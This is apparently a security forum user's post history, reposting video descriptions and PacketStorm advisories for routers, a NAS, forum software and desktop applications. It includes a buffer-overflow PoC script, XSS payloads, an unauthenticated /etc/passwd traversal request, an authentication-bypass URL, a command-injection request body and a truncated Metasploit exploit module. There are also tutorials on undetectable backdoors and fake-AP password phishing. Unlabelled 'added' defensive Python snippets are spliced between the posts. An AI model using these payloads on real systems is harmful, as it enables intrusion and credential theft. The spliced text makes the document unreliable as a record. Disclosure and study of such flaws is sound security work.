Praetorian503

Posts posted by Praetorian503



  1. Description: What kind of internal and external controls from regulations and other sources are there? What is IT-Risk and IT-Compliance management? Why and for whom does it matter? How can we handle it and how does compliance aggregation fit into the picture?
    We will then look at the SOMAP.org project which is an Open Source project working on tools to handle IT-Compliance aggregation and IT Security compliance management in general. We will discuss why compliance management is not only about hot air but can make sense when done right.
    Adrian Wiesmann held this talk at the DeepSec 2011 conference.

    Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

    Original Source: IT Security Compliance Management can be done right (and makes sense when done right) on Vimeo
    Source: It Security Compliance Management Can Be Done Right (And Makes Sense When Done Right)


  2. Description: The talk aims to provide an introduction to the Windows Phone 7 (WP7) security model, to allow security professionals and application developers to understand the unique platform security features offered. Currently very little public information is available about Windows Phone 7 OS security, preventing adequate determination of the risk exposed by WP7 devices.
    The ever increasing challenges and stages of exploitation an attacker has to overcome to achieve full compromise will be discussed. The talk will outline the implementation of these security features and will demonstrate weaknesses and vulnerabilities an attacker could use to bypass the multiple levels of platform security.
    A number of OEM manufacturer weaknesses, "features?" will be discussed and a demonstration of how these "features" can be abused in conjunction with conventional exploits to achieve full compromise of the phone will be performed. The talk will demonstrate how OEM phone manufacturers can weaken the security posture of an otherwise strong granular security model and also demonstrate how targeted attacks can be made which leverage this OEM "functionality" to compromise sensitive information.
    Alex Plaskett held this talk at the DeepSec 2011 security conference.

    Original Source: Windows Pwn 7 OEM - Owned Every Mobile? on Vimeo
    Source: Windows Pwn 7 Oem - Owned Every Mobile?


  3. Description: In this video I will show you how to analyse SilentBanker malware memory using the Volatility Framework.

    Original Source:

    Source: Volatility Silentbanker Malware Analysis


  4. Description: In this video I will show you how to create a persistence backdoor using Metasploit meterpreter. This is a very old trick but still useful for maintaining access on a system using an AB script.

    Original Source:

    Source: Metasploit - Persistence Backdoor
  5. A memory corruption vulnerability has been identified in Photodex ProShow Producer version 5.0.3297. When opening a crafted style file (.pxs), the application loads the "title" value from the pxs file. The ColorPickerProc function does not properly validate the length of the string loaded from the "title" value from the pxs file before using it in the further application context, which leads to a memory corruption condition with possible code execution depending on the version of the operating system.

    Inshell Security Advisory
    http://www.inshell.net


    1. ADVISORY INFORMATION
    -----------------------
    Product: Photodex ProShow Producer
    Vendor URL: www.photodex.com
    Type: Improper Restriction of Operations within the Bounds
    of a Memory Buffer[CWE-119]
    Date found: 2013-02-14
    Date published: 2013-02-14
    CVSSv2 Score: 4,4 (AV:L/AC:M/Au:N/C:P/I:P/A:P)
    CVE: -


    2. CREDITS
    ----------
    This vulnerability was discovered and researched by Julien Ahrens from
    Inshell Security.


    3. VERSIONS AFFECTED
    --------------------
    Photodex ProShow Producer v5.0.3297, older versions may be affected too.


    4. VULNERABILITY DESCRIPTION
    ----------------------------
    A memory corruption vulnerability has been identified in Photodex
    ProShow Producer v5.0.3297.

    When opening a crafted style file (.pxs), the application loads the
    "title" value from the pxs file.

    The ColorPickerProc function does not properly validate the length of
    the string loaded from the "title" value from the pxs file before using
    it in the further application context, which leads to a memory
    corruption condition with possible code execution depending on the
    version of the operating system.

    Vulnerable function definition (all.dnt):
    __stdcall ColorPickerProc(x, x, x, x)

    An attacker needs to force the victim to open a crafted .pxs file in
    order to exploit the vulnerability. Successful exploits can allow
    attackers to execute arbitrary code with the privileges of the user
    running the application. Failed exploits will result in
    denial-of-service conditions.


    5. PROOF-OF-CONCEPT (Code / Exploit)
    ------------------------------------
    The following generated string has to be inserted into a .pxs file to
    trigger the vulnerability on Windows XP SP3.

    #!/usr/bin/python
    # Writes the crash string to poc.txt; the string is then placed in the
    # "title" value of a .pxs style file.
    filename = "poc.txt"

    junk1 = b"\x41" * 233   # filler before the four bytes that land in EIP
    eip   = b"\x42" * 4     # overwrites the return address with 0x42424242
    junk2 = b"\xCC" * 100   # int3 padding after the overwrite

    poc = junk1 + eip + junk2

    try:
        print("[*] Creating exploit file...\n")
        with open(filename, "wb") as out:   # binary mode keeps the raw bytes
            out.write(poc)
        print("[*] File successfully created!")
    except IOError:
        print("[!] Error while creating file!")


    For further Screenshots and/or PoCs visit:
    http://security.inshell.net/advisory/46


    6. SOLUTION
    -----------
    None


    7. REPORT TIMELINE
    ------------------
    2013-02-14: Discovery of the vulnerability
    2013-02-14: Full Disclosure because the vendor ignored all previous
    reports.


    8. REFERENCES
    -------------
    http://security.inshell.net/advisory/46

    Source: PacketStorm

  6. The Edimax EW-7206APg and EW-7209APg suffer from cross site scripting, HTTP header injection, and open redirection vulnerabilities.

    Device Name: EW-7206APg / EW-7209APg
    Vendor: Edimax

    ============ Vulnerable Firmware Releases: ============

    Device: EW-7206APg
    Hardware Version Rev. A
    Runtime Code Version v1.32
    Runtime Code Version V1.33

    Device: EW-7209APg
    Hardware Version Rev. A
    Runtime Code Version 1.21
    Runtime Code Version 1.29

    ============ Device Description: ============

    Acting as a bridge between the wired Ethernet and the 2.4GHz IEEE 802.11g/b wireless LAN, this wireless LAN access point can let your wireless LAN client stations access both the wired and the wireless network nodes.

    EW-7206APg: http://www.edimax.com/en/produce_detail.php?pl1_id=25&pl2_id=134&pl3_id=359&pd_id=18
    EW-7209APg: http://www.edimax-de.eu/de/support_detail.php?pd_id=18&pl1_id=1

    ============ Vulnerability Overview: ============

    * URL Redirection:
    Parameter: submit-url and wlan_url

    http://192.168.178.175/goform/formWirelessTbl?submit-url=http://www.google.de

    http://192.168.178.175/goform/formWlanSetup?apMode=0&band=2&ssid=test&chan=11&macAddrValue=5C260A2BF03F&wlanMacClone=0&wlanMac=000000000000&autoMacClone=no&repeaterSSID=&wlLinkMac1=000000000000&wlLinkMac2=000000000000&wlLinkMac3=000000000000&wlLinkMac4=000000000000&wlLinkMac5=000000000000&wlLinkMac6=000000000000&x=57&y=20&wlan-url=http://www.pwnd.pwnd

    * reflected XSS:
    Parameter: submit-url and wlan-url

    Injecting scripts into the parameter submit-url or wlan-url reveals that this parameter is not properly validated for malicious input.

    Example Exploit:
    http://192.168.178.175/goform/formWlanSetup?apMode=0&band=2&ssid=&chan=11&macAddrValue=&wlanMacClone=0&wlanMac=&autoMacClone=no&repeaterSSID=&wlLinkMac1=&wlLinkMac2=&wlLinkMac3=&wlLinkMac4=&wlLinkMac5=&wlLinkMac6=&x=54&y=12&wlan-url=test><script>alert('XSSed')</script>test

    * stored XSS

    * in System Utility -> Domain Name:
    => parameter: DomainName

    Injecting scripts into the parameter DomainName reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

    http://192.168.178.175/goform/formTcpipSetup?oldpass=&newpass=&confpass=&ip=192.168.178.175&mask=255.255.255.0&gateway=0.0.0.0&dhcp=2&DhcpGatewayIP=0.0.0.0&DhcpNameServerIP=0.0.0.0&dhcpRangeStart=192.168.178.100&dhcpRangeEnd=192.168.178.200&DomainName="><script>alert(2)</script>&leaseTimeGet=946080000&leaseTime=946080000&B1.x=52&B1.y=21&submit-url=%2Fsysutility.asp&ipChanged=

    * Stored XSS in wireless settings / basic settings -> ESSID
    -> The injected script code gets executed within the device information

    Injecting scripts into the parameter ssid reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

    Example Request:
    POST /goform/formWlanSetup HTTP/1.1
    Host: 192.168.178.175
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Proxy-Connection: keep-alive
    Referer: http://192.168.178.175/wlbasic.asp
    Authorization: Basic xxx
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 351

    apMode=0&band=2&ssid=%22%3E%3Cimg+src%3D%220%22+onerror%3Dalert%281%29%3E&chan=11&macAddrValue=5C260A2BF03F&wlanMacClone=0&wlanMac=000000000000&autoMacClone=no&repeaterSSID=&wlLinkMac1=000000000000&wlLinkMac2=000000000000&wlLinkMac3=000000000000&wlLinkMac4=000000000000&wlLinkMac5=000000000000&wlLinkMac6=000000000000&x=50&y=20&wlan-url=%2Fwlbasic.asp

    * HTTP Header Injection:

    Parameter: submit-url

    Injecting code into the parameter submit-url mode reveals that this parameter is not properly validated for malicious input and so it is possible to manipulate the header information.

    http://192.168.178.175/goform/formWirelessTbl?submit-url=e82f5%0d%0aNew%20Header:%20PWND

    Response:
    HTTP/1.0 302 Redirect
    Server: GoAhead-Webs
    Date: Sat Jan 1 14:06:23 2000
    Pragma: no-cache
    Cache-Control: no-cache
    Content-Type: text/html
    Location: http://192.168.178.175/e82f5
    New Header: PWND
    <snip>

    ============ Solution ============

    No known solution available.

    ============ Credits ============

    The vulnerability was discovered by Michael Messner
    Mail: devnull#at#s3cur1ty#dot#de
    Web: http://www.s3cur1ty.de
    Advisory URL: http://www.s3cur1ty.de/m1adv2013-009
    Twitter: @s3cur1ty_de

    ============ Time Line: ============

    September 2012 - discovered vulnerability
    21.09.2012 - contacted vendor with vulnerability details
    24.09.2012 - vendor responded that they will not provide a fix
    14.02.2013 - public disclosure

    ===================== Advisory end =====================

    Source: PacketStorm
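As an added defensive example (not part of the advisory or the vendor firmware), the following Python shows how a form handler could treat the submit-url / wlan-url redirect parameter and the stored ssid / DomainName settings so that the open redirect, header injection and XSS findings above do not arise. The allowlist of local pages and the 32-character bound are assumptions for the example.

```python
import html
import re
from urllib.parse import unquote, urlsplit

# CR, LF and other C0 controls in a Location value let a client append
# headers of its own (the "New Header: PWND" response above).
_CTRL = re.compile(r"[\x00-\x1f\x7f]")

# Pages a form handler may legitimately return to (assumed allowlist).
LOCAL_PAGES = frozenset({"/index.asp", "/wlbasic.asp", "/sysutility.asp"})


def safe_redirect_target(raw_value, default="/index.asp"):
    """Return a Location value that is safe to emit for submit-url / wlan-url.

    Rejects absolute or scheme-relative URLs (open redirect), values with
    control characters (header injection) and paths not on the allowlist
    (which also covers the reflected "<script>" payload); the fallback is
    the device's own default page.
    """
    value = unquote(raw_value or "")
    if _CTRL.search(value):
        return default
    parts = urlsplit(value)
    if parts.scheme or parts.netloc or value.startswith("//"):
        return default
    if parts.path not in LOCAL_PAGES:
        return default
    return parts.path


def render_setting(value, max_len=32):
    """HTML-escape a stored setting (ssid, DomainName) before it is echoed
    into the device information page, after bounding its length (assumed
    limit of 32 characters, the usual SSID maximum)."""
    return html.escape((value or "")[:max_len], quote=True)


def check_advisory_values():
    """Run the checks over the exact parameter values from the advisory."""
    return {
        "open_redirect": safe_redirect_target("http://www.google.de"),
        "crlf": safe_redirect_target("e82f5%0d%0aNew%20Header:%20PWND"),
        "reflected_xss": safe_redirect_target(
            "test><script>alert('XSSed')</script>test"),
        "legit": safe_redirect_target("%2Fsysutility.asp"),
        "ssid": render_setting('"><img src="0" onerror=alert(1)>'),
    }


if __name__ == "__main__":
    for name, value in check_advisory_values().items():
        print(f"{name:14s} -> {value!r}")
```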

  7. The TP-Link TL-WA701N and TL-WA701ND suffer from stored cross site scripting and directory traversal vulnerabilities.

    Device Name: TL-WA701N / TL-WA701ND
    Vendor: TP-Link

    ============ Vulnerable Firmware Releases: ============

    Firmware Version: 3.12.6 Build 110210 Rel.37112n
    Firmware Version: 3.12.16 Build 120228 Rel.37317n - Published Date 2/28/2012
    Hardware Version: WA701N v1 00000000
    Model No.: TL-WA701N / TL-WA701ND

    Firmware download: http://www.tp-link.com/en/support/download/?model=TL-WA701ND&version=V1

    ============ Vulnerability Overview: ============

    * Directory Traversal:

    Access local files of the device. For example you could read /etc/passwd and /etc/shadow.

    Request:
    GET /help/../../etc/passwd HTTP/1.1
    Host: 192.168.178.2
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Proxy-Connection: keep-alive
    Referer: http://192.168.178.2/help/

    ==>> no authentication needed!!!

    Response:
    HTTP/1.1 200 OK
    Server: TP-LINK Router
    Connection: close
    WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Access Point WA701N"
    Content-Type: text/html

    <META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
    <HTML>
    <HEAD><TITLE>TL-WA701N</TITLE>
    <META http-equiv=Pragma content=no-cache>
    <META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT">
    <LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css">
    <SCRIPT language="javascript" type="text/javascript"><!--
    if(window.parent == window){window.location.href="http://192.168.178.2";}
    function Click(){ return false;}
    document.oncontextmenu=Click;
    function doPrev(){history.go(-1);}
    //--></SCRIPT>
    root:x:0:0:root:/root:/bin/sh
    Admin:x:0:0:root:/root:/bin/sh
    bin:x:1:1:bin:/bin:/bin/sh
    daemon:x:2:2:daemon:/usr/sbin:/bin/sh
    adm:x:3:4:adm:/adm:/bin/sh
    lp:x:4:7:lp:/var/spool/lpd:/bin/sh
    sync:x:5:0:sync:/bin:/bin/sync
    shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
    operator:x:11:0:Operator:/var:/bin/sh
    nobody:x:65534:65534:nobody:/home:/bin/sh
    ap71:x:500:0:Linux User,,,:/root:/bin/sh

    Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/TP-Link-directory-traversal.png

    This traversal vulnerability was already reported on some other TP-Link devices: https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/6.x/http-tplink-dir-traversal.nse

    * The request for changing the password is an HTTP GET, and the username and password are parameters of this HTTP GET:

    http://192.168.178.2/userRpm/ChangeLoginPwdRpm.htm?oldname=admin&oldpassword=XXXX&newname=admin&newpassword=XXXX&newpassword2=XXXX&Save=Save

    * Stored XSS:

    Injecting scripts into the parameter Desc reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

    -> Wireless MAC Filtering -> Add or Modify -> put your XSS in the description (parameter Desc)

    Example Request:
    http://192.168.178.2/userRpm/WlanMacFilterRpm.htm?Mac=00-11-22-33-44-55&Desc=%22%3E%3Cimg+src%3D%220%22+onerror%3Dalert%281)>&Type=1&entryEnabled=1&Changed=0&SelIndex=0&Page=1&vapIdx=1&Save=Save

    This XSS vulnerability was already documented on another device and firmware version: http://www.exploit-db.com/exploits/19774/

    * Stored XSS:

    -> System Tools -> SNMP:

    Injecting scripts into the parameter sys_name and sys_location reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

    http://192.168.178.2/userRpm/SnmpRpm.htm?snmp_agent=0&sys_contact=123&sys_name=</script>&sys_location=<script>alert('XSSed')</script>&get_community=111&get_source=123&set_community=123&set_source=111&Save=Save

    ============ Solution ============

    No known solution available.

    ============ Credits ============

    The vulnerability was discovered by Michael Messner
    Mail: devnull#at#s3cur1ty#dot#de
    Web: http://www.s3cur1ty.de
    Advisory URL: http://www.s3cur1ty.de/m1adv2013-011
    Twitter: @s3cur1ty_de

    The traversal vulnerability was already reported on some other TP-Link devices: https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/6.x/http-tplink-dir-traversal.nse

    The stored XSS vulnerability in the Desc parameter was already documented on another device and firmware version: http://www.exploit-db.com/exploits/19774/

    ============ Time Line: ============

    August 2012 - discovered vulnerability
    06.08.2012 - reported vulnerability to TP-Link
    14.02.2013 - public release

    ===================== Advisory end =====================

    Source: PacketStorm
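Added example, not taken from the advisory or from TP-Link's firmware: a path resolver that refuses the /help/../../etc/passwd request shown above, plus a small response check that counts leaked passwd records so a scanner or proxy can flag the 200 response. The web root /www and the sample response body are constructed for the example.

```python
import posixpath
import re
from urllib.parse import unquote

DOCROOT = "/www"   # assumed web root of the device's HTTP server


def resolve_under_root(request_target, docroot=DOCROOT):
    """Map an HTTP request target to a file path under docroot, or return
    None when the request would reach outside it.

    The decoded path is checked for ".." segments before anything is joined:
    posixpath.normpath("/www" + "/help/../../etc/passwd") collapses to
    "/etc/passwd", which is exactly what a server that concatenates the URL
    onto its root ends up opening. The prefix test after normalisation is a
    second, independent guard.
    """
    path = request_target.split("?", 1)[0]
    decoded = unquote(unquote(path))          # twice: catches %252e%252e
    if "\x00" in decoded or "\\" in decoded:
        return None
    if ".." in decoded.split("/"):
        return None
    full = posixpath.normpath(posixpath.join(docroot, decoded.lstrip("/")))
    if full != docroot and not full.startswith(docroot + "/"):
        return None
    return full


# One passwd record per line: name, password field, uid, gid, ...
_PASSWD_LINE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_-]*:[^:\n]*:\d+:\d+:", re.M)


def count_passwd_entries(body):
    """Number of /etc/passwd-style records in a response body; a non-zero
    count on what should be an HTML help page is the leak the advisory shows."""
    return len(_PASSWD_LINE.findall(body))


# Constructed sample: the HTML preamble the device sends, followed by a few
# of the records quoted in the advisory.
SAMPLE_RESPONSE = """<HTML>
<HEAD><TITLE>TL-WA701N</TITLE>
//--></SCRIPT>
root:x:0:0:root:/root:/bin/sh
Admin:x:0:0:root:/root:/bin/sh
nobody:x:65534:65534:nobody:/home:/bin/sh
ap71:x:500:0:Linux User,,,:/root:/bin/sh
"""


if __name__ == "__main__":
    for target in ("/help/index.htm", "/help/../../etc/passwd",
                   "/help/%2e%2e/%2e%2e/etc/passwd"):
        print(f"{target:34s} -> {resolve_under_root(target)}")
    print("passwd records in sample:", count_passwd_entries(SAMPLE_RESPONSE))
```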



  8. Description: In this video Jeremy Druin talks about SQL Server hacking tricks and advanced exploitation techniques.
    He will cover topics like:

    Database Exploitation/Post Exploitation
    Recon: Detecting SQL Server (Passive)
    Scanning: Detecting SQL Server (Active)
    Browsing SQL Server
    SQL Injection etc ..
    More Information : - SQL Server Hacking from ISSA Kentuckiana workshop 7 - Jeremy Druin (Hacking Illustrated Series InfoSec Tutorial Videos)

    Original Source:

    Source: Sql Server Hacking


  9. Description: Forensic timeline analysis puts together actions and events sequentially and chronologically. Construction and presentation of timelines has become a critical investigative method for solving complex issues. To a great extent timeline analysis is a somewhat complicated technique to understand, and the digital environment has different and unique challenges. Timestamps can be found in various time formats and are presented or stored with various interpretations. Timeline building techniques keep evolving and have changed the way an analyst can approach cases. In this discussion we will take a deep dive from timeline basics through the role of timeline analysis in solving cases such as USB device activity, intrusion/malware analysis and intellectual property theft artifacts. During the session we will discuss methodologies for how to start building a timeline, and the granular approach vs. the kitchen sink.
    Timeline analysis includes methods using easily accessible tools and frameworks. Using this technique we gain much more information than can be obtained with traditional techniques such as only the MAC (Modified, Access, and Change) times from a file system. To achieve this goal we will take a deep dive into timestamps associated with:
    · Web Server such as Apache/IIS
    · Browser Activity such as IE History/Chrome/Firefox
    · Windows Event Timestamps, Generic Linux Logs
    · Windows Registry, Prefetch, Recycle bin, Restore Points
    · Windows Shortcuts (.lnk)
    · USB Device Activity
    · PDF, Office Files Metadata Timestamps
    · Flash Cookies or Adobe Local Shared Objects
    · Live Memory Timestamps
    · Antivirus, ISA log, Firewall timestamps
    · Squid Proxy
    · Network Packet Dumps

    Original Source:

    Source: Nullcon Delhi 2012: Forensics Timeline Analysis - By Ashish Kunte


  10. Description: In this video Jeremy Druin talks about Burp Suite proxy usage: how to configure it and how to launch basic attacks using the Burp Suite proxy. He will cover most of the good features of Burp Suite, like Sequencer, Repeater, Intruder and Decoder. For setting up your environment use Mutillidae or DVWA.

    Original Source:

    Source: Mutillidae: Introduction To Installing, Configuring, And Using Burp-Suite Proxy
  11. Ultra Light Forum suffers from a persistent cross site scripting vulnerability.

    # Ultra Light Forum Persistent XSS Vulnerability
    # By cr4wl3r http://bastardlabs.info
    # http://bastardlabs.info/advisories/?id=86
    # Script: http://sourceforge.net/projects/ultralightforum/files/
    # Tested: Win 7

    Description :
    Ultra Light Forum is developed in PHP and MySQL as a standalone forum with high speed and high user-friendliness.
    Users can create and delete topics and can reply to others' topics.
    The forum also comes with polls, where users can vote. To know more, try UL Forum.

    Proof of Concept :
    Choose profile settings, and put the following in the messages box:
    <script>alert(document.cookie)</script>
    Then update your profile.
    If any user views your profile, the script will be executed.

    Demo:
    http://bastardlabs.info/demo/ultraforum1.png
    http://bastardlabs.info/demo/ultraforum2.png

    Source: PacketStorm

  12. Raidsonic versions IB-NAS5220 and IB-NAS4220-B suffer from authentication bypass and persistent cross site scripting vulnerabilities.

    Device Name: IB-NAS5220 / IB-NAS4220-B
    Vendor: Raidsonic

    ============ Vulnerable Firmware Releases: ============

    Product Name IB-NAS5220 / IB-NAS4220-B
    Tested Firmware IB5220: 2.6.3-20100206S
    Tested Firmware IB4220: 2.6.3.IB.1.RS.1

    Firmware Download: http://www.raidsonic.de/data/Downloads/Firmware/IB-NAS5220_standard.zip

    ============ Vulnerability Overview: ============

    * Authentication Bypass:

    -> Access the following URL to bypass the login procedure:
    http://<IP>/nav.cgi?foldName=adm&localePreference=en

    * Stored XSS:

    System -> Time Settings -> NTP Server -> User Define

    Injecting scripts into the parameter ntp_name reveals that this parameter is not properly validated for malicious input. You are able to place this script without authentication.

    Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/ICY-Box-Stored-XSS.png

    * Unauthenticated OS Command Injection

    The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands.

    Example Exploit:
    POST /cgi/time/timeHandler.cgi HTTP/1.1
    Host: 192.168.178.41
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Proxy-Connection: keep-alive
    Referer: http://192.168.178.41/cgi/time/time.cgi
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 186

    month=1&date=1&year=2007&hour=12&minute=10&m=PM&timeZone=Amsterdam`COMMAND`&ntp_type=default&ntpServer=none&old_date=+1+12007&old_time=1210&old_timeZone=Amsterdam&renew=0

    Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/Raidsonic-IB-NAS-command-execution.png

    ============ Solution ============

    No known solution available.

    ============ Credits ============

    The vulnerability was discovered by Michael Messner
    Mail: devnull#at#s3cur1ty#dot#de
    Web: http://www.s3cur1ty.de
    Advisory URL: http://www.s3cur1ty.de/m1adv2013-010
    Twitter: @s3cur1ty_de

    ============ Time Line: ============

    August 2012 - discovered vulnerability
    27.08.2012 - contacted vendor with vulnerability details for IB-NAS4220-B
    28.08.2012 - vendor responded that they will not publish an update
    15.10.2012 - contacted vendor with vulnerability details for IB-NAS5220
    15.10.2012 - vendor responded that they will not publish an update
    12.02.2013 - public release
    ===================== Advisory end =====================

    Source: PacketStorm
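Added example (not the NAS firmware's code): allowlist validation of the timeZone and ping_size values from the time form above, and building the ping command as an argv list so that no shell is involved. The zone allowlist, the ping flags and the 65500-byte size limit are assumptions for the example.

```python
import re
import subprocess
from urllib.parse import parse_qs

# Zone labels the time page offers (assumed subset for this example).
ALLOWED_ZONES = frozenset({"Amsterdam", "Berlin", "London", "New_York", "UTC"})

# Characters that give a value meaning to /bin/sh; used only to classify
# rejected input for logging, never to "clean" it.
_SHELL_META = re.compile(r"[`$|;&<>(){}\\'\"\n\r]")


def looks_injected(value):
    """True when a rejected value carries shell metacharacters, i.e. it is
    worth logging as an attack attempt rather than as a typo."""
    return bool(_SHELL_META.search(value or ""))


def validate_timezone(value):
    """Accept a zone only if it is exactly one of the known labels."""
    return value if value in ALLOWED_ZONES else None


def validate_ping_size(value):
    """ping_size must be a plain decimal in 1..65500; anything else is None."""
    if not re.fullmatch(r"[0-9]{1,5}", value or ""):
        return None
    size = int(value)
    return size if 0 < size <= 65500 else None


def build_ping_argv(host, size):
    """argv for one ping; with a list and shell=False the arguments reach
    ping verbatim, so a backtick in them can never start a second command.
    The flags are those of Linux iputils ping (assumed for the example)."""
    return ["ping", "-c", "1", "-s", str(size), host]


def run_ping(argv):
    """Run the argv without a shell and return the exit status."""
    return subprocess.run(argv, capture_output=True, timeout=10).returncode


def handle_time_form(body):
    """Decide on a timeHandler.cgi body: ('ok', zone) or ('reject', reason)."""
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    raw_zone = form.get("timeZone", "")
    if validate_timezone(raw_zone) is None:
        reason = "timeZone not in allowlist"
        if looks_injected(raw_zone):
            reason += " (shell metacharacters present)"
        return ("reject", reason)
    return ("ok", raw_zone)


# Constructed from the request body quoted in the advisory.
ADVISORY_BODY = ("month=1&date=1&year=2007&hour=12&minute=10&m=PM"
                 "&timeZone=Amsterdam`COMMAND`&ntp_type=default&ntpServer=none"
                 "&old_date=+1+12007&old_time=1210&old_timeZone=Amsterdam&renew=0")


if __name__ == "__main__":
    print(handle_time_form(ADVISORY_BODY))
    print(handle_time_form("timeZone=Amsterdam&renew=0"))
    print(validate_ping_size("64"), validate_ping_size("64`id`"))
    print(build_ping_argv("192.168.178.1", 64))
```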



  13. Description: In this video Jeremy Druin talks about basic usage of sqlmap; this video is part of the ISSA KY Workshop.
    This video will cover sqlmap usage: automated SQL injection auditing, enumerating the database account, databases, schema, tables, columns and password hashes, etc. A must watch if you are interested in the sqlmap tool. For setting up your environment use Mutillidae or DVWA.

    Original Source:

    Source: Basics Of Using Sqlmap - Issa Ky Workshop


  14. Description: In this video you will learn how to bypass freeSSHd authentication using the Metasploit Framework; to exploit this vulnerability you only need a username, which defaults to root.
    Affected Version : - Freesshd version 1.2.6 and prior

    More Information : - CVE-2012-6066 Freesshd Authentication Bypass Metasploit Demo

    Original Source:

    Source: Cve-2012-6066 Freesshd Authentication Bypass Metasploit Demo


  15. Description: This video is all about the VMware OVF Tool format string vulnerability and exploiting that vulnerability
    using Metasploit. This vulnerability was discovered and reported by Jeremy Brown (Microsoft).

    Affected Versions are:
    VMware OVF Tool 2.1 and previous for Windows
    VMware Workstation 8.0.5 and previous for Windows
    VMware Player 4.0.4 and previous for Windows

    More Information : - CVE-2012-3569 VMWare OVF Tool Vulnerability Metasploit Demo

    Original Source:

    Source: Cve-2012-3569 Vmware Ovf Tools Format String Vulnerability Metasploit Demo


  16. Description: In this demo I will show you how to create a fake AP for stealing passwords and how to use the Social-Engineer Toolkit to create a fake web page for phishing. The Social-Engineer Toolkit is a very useful tool for creating a fake page, and once the victim enters the password it will auto-redirect to the main page, so the victim will probably think they entered a wrong password.

    Original Source:

    Source: Fake Ap – Compromise Passwords Using Set.


  17. Description: Create an executable backdoor using a PowerShell script.
    In this video I will show you how to create a backdoor using a PowerShell script. Before you start you need the PowerGUI Script Editor for converting the PowerShell script into an exe, and this exe is fully undetectable - of course. Now create your own script for exploitation, or use the Social-Engineer Toolkit for the PowerShell script; use the reverse shell script for this demo.

    Original Source:

    Source: Create An Executable Backdoor Using Powershell Script.
  18. This Metasploit module exploits a vulnerability in the Foxit Reader Plugin, which exists in the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts, overly long query strings within URLs can cause a stack-based buffer overflow, which can be exploited to execute arbitrary code. This exploit has been tested on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281 (npFoxitReaderPlugin.dll version 2.2.1.530).

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote

      include Msf::Exploit::Remote::HttpServer::HTML

      Rank = NormalRanking

      def initialize(info={})
        super(update_info(info,
          'Name'           => "Foxit Reader Plugin URL Processing Buffer Overflow",
          'Description'    => %q{
            This module exploits a vulnerability in the Foxit Reader Plugin, it exists in
            the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts,
            overly long query strings within URLs can cause a stack-based buffer overflow,
            which can be exploited to execute arbitrary code. This exploit has been tested
            on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281
            (npFoxitReaderPlugin.dll version 2.2.1.530).
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
            [
              'rgod <rgod[at]autistici.org>',       # initial discovery and poc
              'Sven Krewitt <svnk[at]krewitt.org>', # metasploit module
              'juan vazquez',                       # metasploit module
            ],
          'References'     =>
            [
              [ 'OSVDB', '89030' ],
              [ 'BID', '57174' ],
              [ 'EDB', '23944' ],
              [ 'URL', 'http://retrogod.altervista.org/9sg_foxit_overflow.htm' ],
              [ 'URL', 'http://secunia.com/advisories/51733/' ]
            ],
          'Payload'        =>
            {
              'Space'       => 2000,
              'DisableNops' => true
            },
          'DefaultOptions' =>
            {
              'EXITFUNC'             => "process",
              'InitialAutoRunScript' => 'migrate -f'
            },
          'Platform'       => 'win',
          'Targets'        =>
            [
              # npFoxitReaderPlugin.dll version 2.2.1.530
              [ 'Automatic', {} ],
              [ 'Windows 7 SP1 / Firefox 18 / Foxit Reader 5.4.4.11281',
                {
                  'Offset'          => 272,
                  'Ret'             => 0x1000c57d, # pop # ret # from npFoxitReaderPlugin
                  'WritableAddress' => 0x10045c10, # from npFoxitReaderPlugin
                  :rop              => :win7_rop_chain
                }
              ]
            ],
          'Privileged'     => false,
          'DisclosureDate' => "Jan 7 2013",
          'DefaultTarget'  => 0))
      end

      def get_target(agent)
        # If the target is already specified by the user, we'll just use that
        return target if target.name != 'Automatic'

